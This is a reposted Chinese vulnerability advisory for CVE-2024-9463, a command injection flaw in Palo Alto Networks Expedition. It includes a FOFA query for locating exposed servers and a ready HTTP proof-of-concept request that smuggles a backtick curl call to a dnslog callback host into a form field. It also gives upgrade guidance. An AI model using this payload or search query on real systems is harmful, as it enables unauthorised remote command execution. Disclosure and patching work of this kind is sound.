Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

admin 2024年11月1日12:52:44评论41 views字数 846阅读2分49秒阅读模式
Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)
Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)
Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的POC信息及POC对应脚本而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号nday poc及作者不为此承担任何责任,一旦造成后果请自行承担!如文章有侵权烦请及时告知,我们会立即删除文章并致歉。谢谢!

00
产品简介

Palo Alto Networks Expedition 是一款强大的工具,帮助用户有效地迁移和优化网络安全策略,提升安全管理的效率和效果。它的自动化功能、策略分析和可视化报告使其在网络安全领域中成为一个重要的解决方案。

01
漏洞概述

Palo Alto Networks Expedition 1.2.92 以下版本 convertCSVtoParquet 接口存在远程命令执行漏洞。恶意攻击者可以利用该漏洞远程执行任意命令,获取系统权限。

02
搜索引擎
FOFA: 
title="Expedition Project"

Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

03
漏洞复现
POST /API/convertCSVtoParquet.php HTTP/1.1Host: Content-Type: application/x-www-form-urlencodedram=watchTowr`curl+http://odtcqx.dnslog.cn`

Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

04
检测工具

nuclei

Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

afrog

Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

xray

Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

05
修复建议

1、关闭互联网暴露面或接口设置访问权限

2、针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:

Palo Alto Networks Expedition >= 1.2.92

下载链接:

https://live.paloaltonetworks.com/t5/expedition/ct-p/migration_tool

安装前,请确保备份所有关键数据,并按照官方指南进行操作。安装后,进行全面测试以验证漏洞已被彻底修复,并确保系统其他功能正常运行

06

原文始发于微信公众号(nday POC):Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日12:52:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Palo Alto Networks Expedition 远程命令执行漏洞(CVE-2024-9463)https://cn-sec.com/archives/3342497.html

发表评论

匿名网友 填写信息